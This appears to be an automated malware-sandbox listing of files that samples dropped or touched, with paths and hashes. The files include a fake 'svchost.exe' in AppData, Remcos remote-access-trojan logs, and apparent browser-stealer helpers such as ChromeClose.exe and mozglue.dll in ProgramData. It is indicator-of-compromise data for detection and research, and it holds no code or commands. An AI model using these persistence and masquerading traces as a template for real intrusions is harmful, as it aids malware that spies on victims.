SHA512 8bbd717e2425a5d25c87464b04ea010e4c08fa57c672e5e7023785e5027948033accc1496a47c67a0dda3ad910b062151cefd1b03cccb89f3abf76dbd5700ac0

memory/4672-2160-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/3176-2159-0x000001FD56F80000-0x000001FD56FDA000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe

MD5 132f74bd9b76fb23e6fda5d94ed5e830
SHA1 50915a5adc087282094bd772826100d3734b94c7
SHA256 38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49
SHA512 a1179ea09fc8ef7f6655e7e02c4eab3f2b1b15bda4303715d32fe0a7c90381745c276903db9eca9458bdc4fc20806eca1d77bb6bb5e03d0d834d6ed912b9ea2b

C:\Users\Admin\AppData\Local\Temp\tmpF772.tmp.bat

MD5 9abea5f66a3fd69fee4c7d6b173bc2c4
SHA1 7851ce3c5036c69a7434d785fcbc4f466fe56d12
SHA256 8ff50520f3f12d1d9b88d261c45addb97319ff764f8d461bbea24080473f2feb
SHA512 b08b570810abb754ff0adff6c71921f262427e76fb198e3459957145518b6b639eb762f197eefe0288b62281cafef9fd01a8b9b379b0eca7a2f079878996ade7

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 74c9d3fc91b0d8ac5620a3efc82cae69
SHA1 6ceea062fa22d785b4d5c64768acd5738aac130b
SHA256 14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66
SHA512 9beb3728776fec9f6da6da3aaea48e06a4ffd39ace4e6078973e5d5496add4142da5f651aec816eeddb6b5b866b1f301c410287fe89e448a0a9d02c350d228d5

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 74c9d3fc91b0d8ac5620a3efc82cae69
SHA1 6ceea062fa22d785b4d5c64768acd5738aac130b
SHA256 14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66
SHA512 9beb3728776fec9f6da6da3aaea48e06a4ffd39ace4e6078973e5d5496add4142da5f651aec816eeddb6b5b866b1f301c410287fe89e448a0a9d02c350d228d5

C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

MD5 ffa8dfd4bfeda52e6608e451c2e8c27b
SHA1 b53a62f62a484bbbf1de1220e8e2d9feab05936b
SHA256 06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e
SHA512 afce52b40ecd6addda262527542ca6f3ab9d8f661955b1a631a94438d9990f31e9d08f724e2d10bf21b60692c700ee1e8e8bc8726e6a6acfba5ab9d77b093ccf

C:\Users\Admin\AppData\Roaming\pIQwCnkHxxbR.exe

MD5 6f2fd71e78a332394d6ab77747d9d81d
SHA1 949c6de97bc614d27a70f5d6f9dead9c2427b96c
SHA256 9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc
SHA512 e5d8190f586657fb81700205869e1abe0f40726ac2f5bce4cbc06ef6c5c1a0bbaf34e1b2471a4d780dbf62f165f178f121bace319b2c1065b284b406d86a3ee9

C:\Users\Admin\AppData\Local\Temp\tmp921C.tmp

MD5 afa1357e8cee0a1bd6b481a0891ec4ce
SHA1 4d705e73330aee1be844923a8445810bf174cdc0
SHA256 e1fde8c40afd566a8aa92d2e1f23b35af345dc09fae3fe03adea8fae3398bb82
SHA512 ab1203b81657ec77bb9ddd44a09ee3c00bf308be860094a6758de5e2bcbdb0b618cd88f06a6e4006d7e8f4d3a9aee0671f72636048a5dd04e1e289de796ca351

C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe

MD5 6f2fd71e78a332394d6ab77747d9d81d
SHA1 949c6de97bc614d27a70f5d6f9dead9c2427b96c
SHA256 9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc
SHA512 e5d8190f586657fb81700205869e1abe0f40726ac2f5bce4cbc06ef6c5c1a0bbaf34e1b2471a4d780dbf62f165f178f121bace319b2c1065b284b406d86a3ee9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2b0g35ly.0ua.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e3033cce940642dffde977aa9b160205
SHA1 da40946f011bff01c685de3a072f35663f2c4e2d
SHA256 e33a7bace176bfc024f2fa8328e22e35798bd10aef86ceabf07200b1dc71c6ec
SHA512 ee287d1dce05bbc630ebe0cdef8dc2c77968bfd469580660c9c11eabe0519142f484539582f4bde9a9e801dc029c64ccc8ad8d9515dead942be2d56857baaf2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d8294073f3582e3c0a607a60b6d6ca48
SHA1 3ee881f415563afd0c8265f37eb78235aae909bd
SHA256 31900aacca28ff914c07a077cb9a39ec437ee059958564d718d04ae47426e286
SHA512 8c256228dadfa577cdf938d25ac082a232f1e756cedd587f8e1855c0ff7c09571ebffc8221016ccfdfe0b17d356239685eadd72eaa7c32fe46fcfcdf4aa6cb07

\??\pipe\LOCAL\crashpad_3444_IXTTKTGZPHXLOPBP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6b9a8e089452ec4f3752289e5a65c8a0
SHA1 d83da0f34a38c8978e9aa456abb637811bcf14fd
SHA256 1c890702623abc3c8af28f77b1b7b0adc90839bac95f77ff36fb2d45822462ef
SHA512 b23e228ebf56bac9a402c6198ca6a10e872e733f1df097c8e94950205a494a9d2b78ab5621c8bb585b30f764685ee4d1f9466272b735a4789d29e36bc170b011

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c13cfb0125befd36bd28cd30c988398b
SHA1 dc5eb9eb19cbc504bb63dba1c697465779a85f56
SHA256 a22a6d664067e3fd6d975cfe66930e558b43eae167c846c03e89f26f71000da2
SHA512 dd15d89494d44dce7b454b0d5d407f9d23597989b7acd59e54c4aaa8fd074b06fd4a3288b474833cb1444da044c075fcb322b0719d03426a149524826410c465

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\d15f6e70-be4e-44d6-946e-431c474eaf92.tmp

MD5 6af6a270fed791a881f8eb5ad1ac6b8d
SHA1 0e13c89212bb9689f568e9d5308e014599e2b6ca
SHA256 56097a7a3859e0f11b6deef627f81289311edc49085010fef9174519baac1d64
SHA512 25d0e9b735ad545a0deb1210fb9b1581373844abc603ccb93ecd75c84813a34edb9fcbd71fd39689b80e0a5f77fad7dd289c7e7a673042b6c3e37f400df7d7fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 4994b56e9f61db1c1a6f54be60a67e09
SHA1 c3c0402d8966a1dc0e4e2e2708198b526844e4cc
SHA256 078187574b3190652720cf78177d7bf300dfb359c3e783d8f57e7817c36c62b4
SHA512 ac9553479639e4a4d2ff2d25920f4fc568584a242cae18f3dbe3db050aaad3d8600c17f3f5bbc27853d4f7dbbe50a50a2cabe9a9459fbb6918e8e4ec34559ca7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a60205f09171d711de2ca4ed7cbfa519
SHA1 c43b563b458b10b930697edc67b532f82f3d7d5d
SHA256 aa8a15a2ae3d4204305b0a061ff1d6fa258ae033697e32edc28f13f7a514f9b5
SHA512 0b40a261a0a0c66087142c82c198fa0733cdb0a25fefbc062dd2389e6bb90ce4cbc7200c58e647e1e3e9da5c43edf738e088f60c0dd758a66548aead0ac537b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b12ee6b010e965ed924892682077404b
SHA1 cc06dbdc7cf807fb8aa0f90749f5f07c2fcf55fa
SHA256 fefc13d455791d6cc3d8bee48121ca6d7c21e147fd45c504f236bce95e0ea58d
SHA512 b4178d1bc5b95dbabbc5dd1f902f2601b39904279d56b725a9c4aeacf9c27860c02207b1409298c911976540a30eb194c469f7fea64cb3a117755e57a56c3e1d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe

MD5 bbf978f70ce0b754cd8231c67c165451
SHA1 d9cf4f958a3033734b6e06e40d4285f0ff57da82
SHA256 49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575
SHA512 8bbd717e2425a5d25c87464b04ea010e4c08fa57c672e5e7023785e5027948033accc1496a47c67a0dda3ad910b062151cefd1b03cccb89f3abf76dbd5700ac0

C:\Users\Admin\AppData\Local\PornStar,_Inc\49dedf19d0d69cc9c0247803d_Url_vs25rnjd0dgal5txwaybe0srmht04skl\1.0.0.0\user.config

MD5 ea16445fc2f89b78dfba6d9d6ce37a94
SHA1 2a197dd2465cfa8957b085b7b0763ad8795a804f
SHA256 c0e7684bf43d4d55c98fc17253c940769364a5ac721354e7a57679d7c43ea22a
SHA512 1f25ad62eec2ab651f9c5eafd9ec6ed489c43cc0b86ff4c0d4ce78a46ad45581b90d9310226df565b87bcab1e47dae01c65bd7afa1504261b5c7207340fa5887

C:\Users\Admin\AppData\Local\PornStar,_Inc\49dedf19d0d69cc9c0247803d_Url_vs25rnjd0dgal5txwaybe0srmht04skl\1.0.0.0\fvtokvjm.newcfg

MD5 daeda338f39944b8d465b74a07ce3fa1
SHA1 b1f6d93e248883ee8634ac6885969d5ef0dd9a3b
SHA256 0c55742205612ff009859ba09aa053d3f8ed6fa50ac68082fc90ff55707e9f34
SHA512 20108e4e02da6436c2a7da6f3e8878b758a5c65388a7d4eabc983310b257f1a332e459868837e2cfe934f657c6b048145d048f5d4ca05e9be790ee1b89ac9761

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\ProgramData\remcos\logs.dat

MD5 3f240c7e235d7f66475fe47c19f4484a
SHA1 609afc914a117be621137b08ea779f1000849f2d
SHA256 77354c19a590f2a34e3b3dbdee67a06ac49698eadaf30df5885bfdb460e0a984
SHA512 7603233adce6d74e2db5d86f456461edcf3e1efdcd8dd5200255bf666c4f9625a49c1581423a027a711a1b4e9c6c49c2d930809b91dfdd1547f7d39b85999ded

C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe

MD5 990ca017afaae112752fe887ca1c4685
SHA1 66ff556a6a9874b6c09e4e3babfb3e7d60a5b64f
SHA256 56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec
SHA512 1dbc542398b7bed36eaddd91800db5893bfc823981b35b18591e499769c99f66ae1eb162c408e39a64b7783c3e9339f8a18e42ded666c8c8f9ef8316c32500d2

C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe

MD5 990ca017afaae112752fe887ca1c4685
SHA1 66ff556a6a9874b6c09e4e3babfb3e7d60a5b64f
SHA256 56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec
SHA512 1dbc542398b7bed36eaddd91800db5893bfc823981b35b18591e499769c99f66ae1eb162c408e39a64b7783c3e9339f8a18e42ded666c8c8f9ef8316c32500d2

C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe

MD5 2063f56610cc9d4d1d4804fdc92f8d26
SHA1 573b9ac4d15565cb2dedfce45f97df0b11b829d4
SHA256 74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6
SHA512 4d9b8e775778b56a50b2a7a447d2acfad90c24fad2a9357cf06f65ae88c496c54619d2062695ee30cd7629069eb71dbe03caafc91dace7eb79d5a32b79b36d3f

C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe

MD5 2063f56610cc9d4d1d4804fdc92f8d26
SHA1 573b9ac4d15565cb2dedfce45f97df0b11b829d4
SHA256 74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6
SHA512 4d9b8e775778b56a50b2a7a447d2acfad90c24fad2a9357cf06f65ae88c496c54619d2062695ee30cd7629069eb71dbe03caafc91dace7eb79d5a32b79b36d3f

C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe

MD5 0cf1c234e21549b221bc4b2c81e28037
SHA1 06f7b2c8d262c7703ac8bbcc3038a6bbea1a4b67
SHA256 45ff6ee0df94a3cb333b709f521ca3818bc567bf34bfe7fd4533d3971789d539
SHA512 6c2423374598fcf7d782450363a2e871deb2909a436f0daafc193ff17ea3a4ab575b4bba73eed608416f62231cc28dcd953de07da6ad913707b52611ae98897c

C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe

MD5 0cf1c234e21549b221bc4b2c81e28037
SHA1 06f7b2c8d262c7703ac8bbcc3038a6bbea1a4b67
SHA256 45ff6ee0df94a3cb333b709f521ca3818bc567bf34bfe7fd4533d3971789d539
SHA512 6c2423374598fcf7d782450363a2e871deb2909a436f0daafc193ff17ea3a4ab575b4bba73eed608416f62231cc28dcd953de07da6ad913707b52611ae98897c

C:\Users\Admin\AppData\Local\Temp\uzgsf.dl

MD5 a626e878a12016674242642dfaf0c150
SHA1 abec6f393244a575cf08e6c38ebbf8d4b338e676
SHA256 f51e4f240e5029490d9b4623dc90ca4914dc99208664519b8d4b3695a1051451
SHA512 35428c35ad64335d0aa6c87c10b574fcf02d58e868cfe762b667018dbf0348f74ec99cda540833ee7b80ecb6ad6739cdecf369ff5c4d213a61b68eeb1b814a05

C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe

MD5 0cf1c234e21549b221bc4b2c81e28037
SHA1 06f7b2c8d262c7703ac8bbcc3038a6bbea1a4b67
SHA256 45ff6ee0df94a3cb333b709f521ca3818bc567bf34bfe7fd4533d3971789d539
SHA512 6c2423374598fcf7d782450363a2e871deb2909a436f0daafc193ff17ea3a4ab575b4bba73eed608416f62231cc28dcd953de07da6ad913707b52611ae98897c

C:\Users\Admin\Desktop\2023-09-04\308f90718012b047a2ee3b2ae76a16dddb657537dbd61e2a43ee2bb17725c6a0.exe

MD5 6a4957950ba50f3f047be9b393919c3e
SHA1 eb92e9da7268e43c0215b75ad7e988fe0c77327d
SHA256 308f90718012b047a2ee3b2ae76a16dddb657537dbd61e2a43ee2bb17725c6a0
SHA512 c86680f196473c9129d8231c36012608bbdfacf66704fb52ecb6b76e0ec91f430e9061ce1c0e88b714c7c9f4169fe14d38673ac0a921037e37f6b311a636a0ce

C:\Users\Admin\Desktop\2023-09-04\389b505b95590bf950e653c250e501e3afe81da554d7a6470fbe66038964bf0f.exe

MD5 6f69969f943439a96051dc53f5fe66ea
SHA1 303ccae1f53981550745f3397ebc0e947bd5e98d
SHA256 389b505b95590bf950e653c250e501e3afe81da554d7a6470fbe66038964bf0f
SHA512 7143adcc2e46894b54e87291467bbba3e467cb617ea4683af2d0b9ec639587cad2761c39765a6a81bf03f4d5a58b04f671159332a9034029da8e7f7ae32855fe

C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe

MD5 6a2e5a9901ac89aab48ae125a799921a
SHA1 be29a368dfdaa857f3a212656762e0f0215fea09
SHA256 491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795
SHA512 da295a17dbb4a0936b7a68460738fc6437d112f749e563320f4036f28d1407552ab5023f4400e38529c1ed15e0a07b7ffd5e3b8bca6194bcb4619b84159ed106

C:\Users\Admin\Desktop\2023-09-04\616ca5c757a9fcf6dce88d1e46e85b233ad05457ae6adfce1b6b53660d496841.exe

MD5 eb411026d449c29c6a36ba1f1546400f
SHA1 f3730d1d04eb2a844a86d5cef3237c190ff3c9ec
SHA256 616ca5c757a9fcf6dce88d1e46e85b233ad05457ae6adfce1b6b53660d496841
SHA512 0d0fb20c7a507e0fb1a08960f778d7d0171a6f5df28ea740bdc554e01f508556b1af179d16a9570c04995009742b9a4b85bca42ea405b61ec59366ee241c5e7b

C:\Users\Admin\Desktop\2023-09-04\539a73b89c941089900d7a97da467fbc0b8a7aca89a94f488c278835583d1a5d.exe

MD5 a59eb6198fab285a182e5aff812d765d
SHA1 1ae79484e848b35a1357607aab7ef529df7033ca
SHA256 539a73b89c941089900d7a97da467fbc0b8a7aca89a94f488c278835583d1a5d
SHA512 5ea31513b4fcab46fb3ebecfff957a686c342c954fffbeb9f719b62e3a8d485222962103cdafe910ed05f53a0b90b583f50291a058bd09ba966a59b078de5ffb

C:\Users\Admin\Desktop\2023-09-04\619b74c414ceb8633539d653de1083cedd1643d16d0d3853773daa007fb43cc3.exe

MD5 57c4440f17f50d77e47c1695498dd551
SHA1 a144eb1ee1d8b739b48f23446d2e065e97c7c468
SHA256 619b74c414ceb8633539d653de1083cedd1643d16d0d3853773daa007fb43cc3
SHA512 759fb493d48d1b666da8bbd5041ce26e4e96244b35455605703d521cdaa93927a5c0b38d76a021c4cfc43d51a69033c9ee92e9f8448472e80f7040de2ca56e41

C:\Users\Admin\Desktop\2023-09-04\655ab67db1475dcf9034b03e098b720d36e40d8e68aa75eadea01879ed14c58a.exe

MD5 588827545ab0d5092c8e8ef0ee9c3e68
SHA1 82772d9da31942665d275a3fc622cb1415356268
SHA256 655ab67db1475dcf9034b03e098b720d36e40d8e68aa75eadea01879ed14c58a
SHA512 84412ddd6b6ee6a64a03ee996d57977c8075d04b789fb1f92b608006822d2d2e9b9319febc71575a583d83e01b95c596b47f2f5e4216157ceb74e59d0e5f0368

C:\Users\Admin\Desktop\2023-09-04\631c44548b7bc8c13c2a2025275f90842523dacd60046eeabea9c3da8d20c926.exe

MD5 a9c1c56a42de4df874d9faefa5e8b14a
SHA1 835b27ae359dc86c133748de9e1a00be7f7167ad
SHA256 631c44548b7bc8c13c2a2025275f90842523dacd60046eeabea9c3da8d20c926
SHA512 d4525fe8e7ede099f11cf8f17736cf02a34ff8b40f6d324d0a5ec616ef2e75307e84a0b95ebb363fef7ea5633f653240e84d8be00faf16804bac9d50fe60e76a

C:\Users\Admin\Desktop\2023-09-04\608c9d863cb5d8e929e019965787ced2f9b697b2344f7e1a5cd341fb131d9518.exe

MD5 2772cd5e6bd65659ca6cce557588a046
SHA1 91fca9240e0c5d1a71a1f6b7a3e16fa638b6d0bd
SHA256 608c9d863cb5d8e929e019965787ced2f9b697b2344f7e1a5cd341fb131d9518
SHA512 7523fe56948359de53e59180d298d83e464112203de045de7ba81b6aeadce101273912f67ecd9892f508cc9b96ab4364340e991b24ec919fda3a6f6147b655a6

C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe

MD5 6a2e5a9901ac89aab48ae125a799921a
SHA1 be29a368dfdaa857f3a212656762e0f0215fea09
SHA256 491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795
SHA512 da295a17dbb4a0936b7a68460738fc6437d112f749e563320f4036f28d1407552ab5023f4400e38529c1ed15e0a07b7ffd5e3b8bca6194bcb4619b84159ed106

C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe

MD5 7a3059b652dcbe5b578ec98a507dfb16
SHA1 9f6938dac4e567fedbf5d6baa5488bf17cff7873
SHA256 8eca6c037417729d3c44acffb290a49564ff244b82cf35f4415ec0615ede241c
SHA512 ed66233263745d80a72179744fa9c1b252c3674821e15f456cdc3e8de1843ed249fefb9102761251686ed75ec4b620fdd35a0f918748d98b2368c1472b24c1d9

C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe

MD5 7a3059b652dcbe5b578ec98a507dfb16
SHA1 9f6938dac4e567fedbf5d6baa5488bf17cff7873
SHA256 8eca6c037417729d3c44acffb290a49564ff244b82cf35f4415ec0615ede241c
SHA512 ed66233263745d80a72179744fa9c1b252c3674821e15f456cdc3e8de1843ed249fefb9102761251686ed75ec4b620fdd35a0f918748d98b2368c1472b24c1d9

C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe

MD5 7a3059b652dcbe5b578ec98a507dfb16
SHA1 9f6938dac4e567fedbf5d6baa5488bf17cff7873
SHA256 8eca6c037417729d3c44acffb290a49564ff244b82cf35f4415ec0615ede241c
SHA512 ed66233263745d80a72179744fa9c1b252c3674821e15f456cdc3e8de1843ed249fefb9102761251686ed75ec4b620fdd35a0f918748d98b2368c1472b24c1d9

C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe

MD5 b880e1ee1fd7e56bf0b5dc9f2a4b66ab
SHA1 89a7a7fbea80abf535b931a2df9263b7026634f5
SHA256 689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac
SHA512 5f014baa7692791572feff30b2f71bc49c70b55909dd9824cdf85c3a23ca1ce36ec14f1ff64c51d1c126f511f1b2c444f7c9051a0f5af21f9e64c009c6500afb

C:\Users\Admin\Desktop\2023-09-04\709f3e8040fb042a7c5634bce9cfc2879ce4d805a88b87ee631fc12f0f71de93.exe

MD5 982662aa826163eee2b9d95965fd5cb8
SHA1 e30d9a8992e7b5fa96be5f3a6d40049246fc406c
SHA256 709f3e8040fb042a7c5634bce9cfc2879ce4d805a88b87ee631fc12f0f71de93
SHA512 bce5b1133c5b514ac8afa4251893bd74e9862ea0654c95a9633671c47aeacff949e5fa81a87ed31871f447da0f22f5fb35acb7ca623059213eb8dc24a1db29d2

C:\ProgramData\remcos\logs.dat

MD5 39838844413fb1443b7d7a076a804319
SHA1 93007b80667c859b17e9b5d12d6cd24f42612541
SHA256 364d7914161830ba2447b21e2d9f45c68434f6b4b3de4ed9f0a94f16955850ae
SHA512 c6d135590dcf0bce781f715daf5a10e2953dda94a4d8f5b7c6bb1f8ff19791cd7aa73c3ac8ab5b1f02975861bc67faadada40932c0dd0c33aa7c3fd3904a750c

C:\Users\Admin\AppData\Local\Temp\nsn8A48.tmp\System.dll

MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Roaming\eWFNFYkXygiAi.exe

MD5 990ca017afaae112752fe887ca1c4685
SHA1 66ff556a6a9874b6c09e4e3babfb3e7d60a5b64f
SHA256 56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec
SHA512 1dbc542398b7bed36eaddd91800db5893bfc823981b35b18591e499769c99f66ae1eb162c408e39a64b7783c3e9339f8a18e42ded666c8c8f9ef8316c32500d2

C:\Users\Admin\AppData\Local\Temp\nsb43E5.tmp\System.dll

MD5 17ed1c86bd67e78ade4712be48a7d2bd
SHA1 1cc9fe86d6d6030b4dae45ecddce5907991c01a0
SHA256 bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb
SHA512 0cbed521e7d6d1f85977b3f7d3ca7ac34e1b5495b69fd8c7bfa1a846baf53b0ecd06fe1ad02a3599082ffacaf8c71a3bb4e32dec05f8e24859d736b828092cd5

C:\ProgramData\remcos\logs.dat

MD5 57aa9335d04508cdbe73065a3dea716c
SHA1 c211fce7e6645cfd28c644ad004b65af34130c2a
SHA256 77a475a41167728adea9288153b510553a0e7121fdee2a0ddd1f8300d9857a82
SHA512 62d3ccea0a64404eeb06702f6cdc6fd8e22a5b02c2277f528939687fe75d1a99216b29dcb2c7d48bc87c2ff6cb8acf66cd97212e06c9489454ec3d000eb4a303

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 d6b5dea566a345230ad012011af2e007
SHA1 08445610f34829d416d2a5e0a769e8e4afebe4b9
SHA256 dc8608dd5a5bcc787fca786fc6a5955f517c45b27f9ead4b8edffa4529fed82d
SHA512 6c4ee8b8adb4f66bacd7ab43c67f7923354d2d7e06fc1e485b98d7b081411787750034bf9b97ea5aecea22deeac49985957a1068e023a00719b393e2bd0cf513

C:\ProgramData\remcos\logs.dat

MD5 1b90fb00ce07a999f63dd4e35bce7a91
SHA1 77fd2f839f8cf63e0d6cd1d67d0aaebcad383683
SHA256 d3ff80aadd76356c846b30d2bed66a94bc1b51428bf6053af0958a368a38c1f8
SHA512 d30e3981c0b218bb8b430167efcd47e1286face810143845ae90275e4349e654115f41eafe728ed9d45bf84622547bd1daa0d358b300546d043b9612b7333383

C:\Users\Admin\AppData\Roaming\ClWWWrRvtgVoLl.exe

MD5 57ed9d68311194b21afbc9b33168ddc5
SHA1 a30c8e48c8de418183fef9daed67276e59115736
SHA256 532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c
SHA512 24cb9aaf1fddf7dcd0f64314e541d5bd69965a2c6ca7705ea4e6e3646a6d0bc10662cd2902e7abc0ae28069ee582ed7fb3a9a308aa18f6fd4593179495c0db57

C:\Users\Admin\AppData\Roaming\NzdSupOimejfx.exe

MD5 880f010fc75f433c8e6a4f9931c093fa
SHA1 4782fce5926ff14618e80780d9343dcef78e789d
SHA256 a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138
SHA512 19f7ba28d2870714b5fb63c9f0dfb405647671a59058be6685a8eb336fb61dfd2358cddd49765314981cd52851e4f1359dfa9e36b231726848749332935ac72e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

C:\ProgramData\presepuesto\LEAJ.exe

MD5 a5c6dcf7ef6eac4c0157b5e2f0155424
SHA1 248ad0e9f6f403d172a54abaeaf92df074d617fe
SHA256 6707dfab5d78cad62a28c59519e5809092c5b3d817d39c15a472f0363e88a5fa
SHA512 0e12dc417988ac0358ea7807c4ba1b9894d2679607734b883be5db3cea0e45a537524ac625ab941a377b686f80e92a6623f6bcd06459c848ca04720cc3f7b24c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\b7c624d9d311fdcf61b244bf0defe0d3

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
